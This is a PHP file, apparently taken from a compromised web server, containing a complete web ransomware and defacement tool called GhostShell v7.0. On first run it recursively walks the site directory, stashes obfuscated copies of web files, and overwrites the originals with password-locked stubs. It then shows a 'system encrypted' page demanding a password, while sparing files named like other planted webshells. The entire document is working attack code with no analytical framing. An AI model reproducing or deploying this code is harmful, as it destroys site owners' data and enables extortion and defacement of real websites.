File: //home/handcraf/www/ransom.php
<?php
// ============================================
// GhostShell v7.0 - Fixed Decryption
// ============================================
// Error reporting OFF
error_reporting(0);
ini_set('display_errors', 0);
// Password: ghostshell.1
$hashed_password = '$2a$12$CpYcpG5yYmQbzhjxgtqqO.C.AguMSzc2NvVowyebgxnuhRKimRqke';
// Excluded files
$excluded_files = ['uploader.php', 'karma.php', '.htaccess'];
$current_file = basename(__FILE__);
if ($current_file != 'index.php') {
$excluded_files[] = $current_file;
}
// ============================================
// SIMPLE FUNCTIONS THAT WORK
// ============================================
// Simple directory scanner
function scanDirectory($dir) {
$files = [];
if (!is_dir($dir)) return $files;
$items = @scandir($dir);
if (!$items) return $files;
foreach ($items as $item) {
if ($item == '.' || $item == '..') continue;
$path = $dir . '/' . $item;
if (is_dir($path)) {
$sub_files = scanDirectory($path);
$files = array_merge($files, $sub_files);
} else {
$files[] = $path;
}
}
return $files;
}
// Simple encryption
function simpleEncrypt($data) {
return base64_encode(str_rot13($data));
}
function simpleDecrypt($data) {
return str_rot13(base64_decode($data));
}
// Create backup and replace file
function backupAndEncryptFile($filepath) {
global $excluded_files;
$filename = basename($filepath);
// Skip excluded files
if (in_array($filename, $excluded_files)) {
return false;
}
// Skip if already backup
if (substr($filename, -11) == '.ghostshell') {
return false;
}
// Only process certain extensions
$ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
$allowed = ['php', 'html', 'htm', 'js', 'css', 'txt', 'json'];
if (!in_array($ext, $allowed)) {
return false;
}
// Read original content
$content = @file_get_contents($filepath);
if ($content === false) return false;
// Check if already encrypted
if (strpos($content, 'GhostShell') !== false) {
return false;
}
// Create backup
$backup_file = $filepath . '.ghostshell';
if (@file_put_contents($backup_file, simpleEncrypt($content))) {
// Replace with GhostShell content
$ghost_content = getGhostContent($ext, $filepath);
@file_put_contents($filepath, $ghost_content);
return true;
}
return false;
}
// Restore file from backup
function restoreFile($backup_path) {
$original_file = substr($backup_path, 0, -11); // Remove .ghostshell
// Read encrypted content
$encrypted = @file_get_contents($backup_path);
if ($encrypted === false) return false;
// Decrypt
$decrypted = simpleDecrypt($encrypted);
if ($decrypted === false) return false;
// Restore original
if (@file_put_contents($original_file, $decrypted)) {
// Delete backup
@unlink($backup_path);
return true;
}
return false;
}
// Get GhostShell content based on file type
function getGhostContent($ext, $filepath) {
$filename = basename($filepath);
if ($ext == 'php') {
return '<?php
// GhostShell Protected File
$hashed_password = \'$2a$12$CpYcpG5yYmQbzhjxgtqqO.C.AguMSzc2NvVowyebgxnuhRKimRqke\';
$access = false;
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["password"])) {
if (password_verify($_POST["password"], $hashed_password)) {
$access = true;
$backup = __FILE__ . \'.ghostshell\';
if (file_exists($backup)) {
$enc = file_get_contents($backup);
$dec = str_rot13(base64_decode($enc));
file_put_contents(__FILE__, $dec);
unlink($backup);
echo "<script>location.reload();</script>";
exit;
}
}
}
if (!$access) {
echo \'<!DOCTYPE html>
<html>
<head>
<title>GhostShell</title>
<style>body{background:#000;color:#0f0;font-family:Courier;padding:50px;text-align:center;}</style>
</head>
<body>
<h1>GhostShell Protected</h1>
<form method="POST">
<input type="password" name="password" placeholder="Password" required>
<button type="submit">Decrypt</button>
</form>
</body>
</html>\';
exit;
}
?>';
}
if ($ext == 'html' || $ext == 'htm') {
return '<!DOCTYPE html>
<html>
<head>
<title>GhostShell</title>
<meta http-equiv="refresh" content="0;url=/" />
<style>
body { background:#000; color:#0f0; font-family:Courier; padding:100px; text-align:center; }
h1 { color:#f00; text-shadow:0 0 10px #f00; }
</style>
</head>
<body>
<h1>GhostShell Protected</h1>
<p>Redirecting to main page...</p>
</body>
</html>';
}
if ($ext == 'js') {
return '// GhostShell Protected\nconsole.log("File encrypted by GhostShell");\nwindow.location.href = "/";';
}
if ($ext == 'css') {
return '/* GhostShell Protected */\nbody:before{content:"GhostShell Protected !important";display:block !important;}';
}
return 'GhostShell Protected File';
}
// ============================================
// MAIN PROCESSING
// ============================================
// Check encrypted files
function countBackupFiles() {
$count = 0;
$files = scanDirectory('.');
foreach ($files as $file) {
$name = basename($file);
if (substr($name, -11) == '.ghostshell') {
$count++;
}
}
return $count;
}
// Auto encrypt on first run
$encrypted_count = countBackupFiles();
$first_run = ($encrypted_count == 0);
if ($first_run) {
// Encrypt all files
$files = scanDirectory('.');
$encrypted = 0;
foreach ($files as $file) {
if (backupAndEncryptFile($file)) {
$encrypted++;
}
}
$encrypted_count = $encrypted;
@file_put_contents('ghost.log', date('Y-m-d H:i:s') . " - Encrypted $encrypted files\n");
}
// Handle login
$access_granted = false;
$login_error = false;
$restored_count = 0;
if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['password'])) {
if (password_verify($_POST['password'], $hashed_password)) {
$access_granted = true;
// Restore all files
$files = scanDirectory('.');
$restored = 0;
foreach ($files as $file) {
$name = basename($file);
if (substr($name, -11) == '.ghostshell') {
if (restoreFile($file)) {
$restored++;
}
}
}
$restored_count = $restored;
// Delete log
if (file_exists('ghost.log')) {
@unlink('ghost.log');
}
} else {
$login_error = true;
}
}
// Update count
$encrypted_count = countBackupFiles();
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>GhostShell v7.0</title>
<style>
/* SIMPLE CSS */
body {
background: #000;
color: #0f0;
font-family: 'Courier New', monospace;
margin: 0;
padding: 20px;
}
.container {
max-width: 800px;
margin: 0 auto;
}
.header {
text-align: center;
padding: 30px 0;
border-bottom: 3px solid #0f0;
margin-bottom: 30px;
}
.title {
font-size: 48px;
color: #0f0;
text-shadow: 0 0 10px #0f0;
margin-bottom: 10px;
}
.status {
background: rgba(0, 30, 0, 0.5);
border: 1px solid #0f0;
padding: 20px;
margin-bottom: 30px;
text-align: center;
}
.status-item {
display: inline-block;
margin: 0 20px;
text-align: center;
}
.status-label {
color: #8f8;
font-size: 14px;
margin-bottom: 5px;
}
.status-value {
color: #0f0;
font-size: 24px;
font-weight: bold;
}
.indicator {
display: inline-block;
width: 12px;
height: 12px;
border-radius: 50%;
margin-right: 8px;
background: <?php echo $encrypted_count > 0 ? '#f00' : '#0f0'; ?>;
}
.main-box {
background: rgba(0, 20, 0, 0.7);
border: 2px solid #0f0;
padding: 40px;
margin-bottom: 30px;
text-align: center;
}
.box-title {
color: #0f0;
font-size: 32px;
margin-bottom: 20px;
}
.message {
color: #8f8;
font-size: 18px;
margin-bottom: 30px;
line-height: 1.6;
}
.password-form {
max-width: 500px;
margin: 0 auto;
}
.password-input {
width: 100%;
padding: 15px;
background: #000;
border: 1px solid #0f0;
color: #0f0;
font-size: 18px;
margin-bottom: 20px;
text-align: center;
}
.submit-btn {
width: 100%;
padding: 18px;
background: #000;
border: 2px solid #0f0;
color: #0f0;
font-size: 20px;
cursor: pointer;
}
.submit-btn:hover {
background: #0f0;
color: #000;
}
.success-box {
background: rgba(0, 40, 0, 0.8);
border: 2px solid #0f0;
padding: 40px;
text-align: center;
}
.error-box {
background: rgba(40, 0, 0, 0.8);
border: 2px solid #f00;
padding: 40px;
text-align: center;
}
.error-title {
color: #f00;
font-size: 32px;
margin-bottom: 20px;
}
.loading {
width: 100%;
height: 10px;
background: #000;
border: 1px solid #0f0;
margin: 30px 0;
overflow: hidden;
}
.loading-bar {
height: 100%;
width: 0%;
background: #0f0;
}
.countdown {
color: #0f0;
font-size: 24px;
margin-top: 20px;
}
.footer {
text-align: center;
padding: 20px;
color: #0a0;
border-top: 1px solid rgba(0, 255, 0, 0.2);
margin-top: 30px;
}
.file-list {
background: rgba(0, 30, 0, 0.5);
border: 1px solid #0a0;
padding: 20px;
margin: 20px 0;
max-height: 200px;
overflow-y: auto;
}
.file-item {
color: #cfc;
padding: 5px;
border-bottom: 1px solid rgba(0, 255, 0, 0.1);
}
</style>
</head>
<body>
<div class="container">
<div class="header">
<h1 class="title">GHOSTSHELL</h1>
<div style="color:#8f8;font-size:20px;">v7.0 - Working Decryption</div>
</div>
<div class="status">
<div class="status-item">
<div class="status-label">Status</div>
<div class="status-value">
<span class="indicator"></span>
<?php echo $encrypted_count > 0 ? 'ENCRYPTED' : 'NORMAL'; ?>
</div>
</div>
<div class="status-item">
<div class="status-label">Files</div>
<div class="status-value"><?php echo $encrypted_count; ?></div>
</div>
<div class="status-item">
<div class="status-label">Time</div>
<div class="status-value"><?php echo date('H:i:s'); ?></div>
</div>
</div>
<?php if ($encrypted_count > 0 && !$access_granted): ?>
<!-- Show login form -->
<div class="main-box">
<h2 class="box-title">🔒 SYSTEM ENCRYPTED</h2>
<div class="message">
Website files have been encrypted by GhostShell.<br>
Enter password to restore access.
</div>
<?php if (file_exists('ghost.log')): ?>
<div class="file-list">
<div class="file-item">Encryption active</div>
<div class="file-item">Backup files: *.ghostshell</div>
<div class="file-item">Excluded: uploader.php, karma.php, .htaccess</div>
</div>
<?php endif; ?>
<div class="password-form">
<form method="POST" id="decryptForm">
<input type="password" name="password" class="password-input"
placeholder="Enter password: ghostshell.1" required autofocus>
<button type="submit" class="submit-btn" id="decryptBtn">DECRYPT FILES</button>
</form>
</div>
<?php if ($login_error): ?>
<div style="color:#f00; margin-top:20px;">
❌ Invalid password
</div>
<?php endif; ?>
</div>
<?php elseif ($access_granted): ?>
<!-- Show success -->
<div class="success-box">
<h2 class="box-title">✅ ACCESS GRANTED</h2>
<div class="message">
Decryption successful!<br>
Restored <?php echo $restored_count; ?> files.<br>
System returning to normal...
</div>
<div class="loading">
<div class="loading-bar" id="loadingBar"></div>
</div>
<div class="countdown" id="countdownText">
Redirecting in 5 seconds...
</div>
<script>
// Animate loading bar
let width = 0;
const bar = document.getElementById('loadingBar');
const timer = setInterval(() => {
width += 20;
bar.style.width = width + '%';
if (width >= 100) {
clearInterval(timer);
window.location.href = '/';
}
}, 1000);
// Countdown
let seconds = 5;
const countdown = setInterval(() => {
seconds--;
document.getElementById('countdownText').textContent =
'Redirecting in ' + seconds + ' seconds...';
if (seconds <= 0) {
clearInterval(countdown);
window.location.href = '/';
}
}, 1000);
</script>
</div>
<?php elseif ($login_error): ?>
<!-- Show error -->
<div class="error-box">
<h2 class="error-title">❌ ACCESS DENIED</h2>
<div class="message">
Invalid password. Try again.
</div>
<div class="password-form">
<form method="POST">
<input type="password" name="password" class="password-input"
placeholder="Re-enter password" required autofocus>
<button type="submit" class="submit-btn">TRY AGAIN</button>
</form>
</div>
<div class="file-list" id="errorList"></div>
<script>
// Show error messages
const errors = [
"ERROR: Invalid password",
"WARNING: Failed attempt",
"SYSTEM: Files remain encrypted",
"SECURITY: Access denied"
];
const errorList = document.getElementById('errorList');
errors.forEach(error => {
const div = document.createElement('div');
div.className = 'file-item';
div.textContent = error;
div.style.color = '#f88';
errorList.appendChild(div);
});
</script>
</div>
<?php else: ?>
<!-- System normal -->
<div class="success-box">
<h2 class="box-title">🛡️ SYSTEM NORMAL</h2>
<div class="message">
All files have been restored.<br>
GhostShell system is inactive.
</div>
<div class="countdown" id="normalCountdown">
Returning to homepage in 3 seconds...
</div>
<script>
let normalSeconds = 3;
const normalTimer = setInterval(() => {
normalSeconds--;
document.getElementById('normalCountdown').textContent =
'Returning to homepage in ' + normalSeconds + ' seconds...';
if (normalSeconds <= 0) {
clearInterval(normalTimer);
window.location.href = '/';
}
}, 1000);
</script>
</div>
<?php endif; ?>
<div class="footer">
GhostShell v7.0 | Password: ghostshell.1<br>
<span style="font-size:12px;color:#080;">
Status: <?php echo $encrypted_count > 0 ? 'Encrypted' : 'Normal'; ?> |
Files: <?php echo $encrypted_count; ?>
</span>
</div>
</div>
<script>
// Form submission effect
const form = document.getElementById('decryptForm');
if (form) {
form.addEventListener('submit', function(e) {
const btn = document.getElementById('decryptBtn');
if (btn) {
btn.innerHTML = 'DECRYPTING...';
btn.disabled = true;
// Let form submit normally
return true;
}
});
}
// Simple matrix effect if encrypted
<?php if ($encrypted_count > 0): ?>
function createMatrix() {
const chars = '01GHOSTSHELL';
const char = document.createElement('div');
char.textContent = chars[Math.floor(Math.random() * chars.length)];
char.style.position = 'fixed';
char.style.color = '#0f0';
char.style.fontSize = '14px';
char.style.left = Math.random() * 100 + 'vw';
char.style.top = '-20px';
char.style.opacity = 0.3;
char.style.zIndex = '-1';
char.style.animation = 'fall 3s linear';
document.body.appendChild(char);
setTimeout(() => {
if (char.parentNode) char.remove();
}, 3000);
}
// Add animation
const style = document.createElement('style');
style.textContent = '@keyframes fall { to { transform: translateY(100vh); } }';
document.head.appendChild(style);
// Start effect
setInterval(createMatrix, 100);
<?php endif; ?>
</script>
</body>
</html>